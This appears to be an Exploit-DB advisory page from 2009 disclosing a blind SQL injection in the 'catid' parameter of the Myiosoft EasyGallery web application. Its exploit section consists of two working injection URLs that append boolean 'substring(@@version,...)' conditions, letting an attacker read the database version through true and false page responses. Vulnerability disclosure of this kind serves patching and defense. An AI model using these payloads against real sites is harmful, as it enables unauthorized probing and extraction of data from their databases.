Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability

  • EDB-ID: 10873
  • CVE: N/A
  • OSVDB-ID: N/A
  • Author: Hussin X
  • Published: 2009-12-31
  • Verified: Verified
  • Exploit Code:   Download
  • Vulnerable App:    N/A
Next Exploit Previous Exploit Home 
Myiosoft easygallery (catid)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________


script  : http://myiosoft.com/?1.105.0.0

Exploit :
_______
true & false

http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false

http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true




end
  IQ-SecuritY FoRuM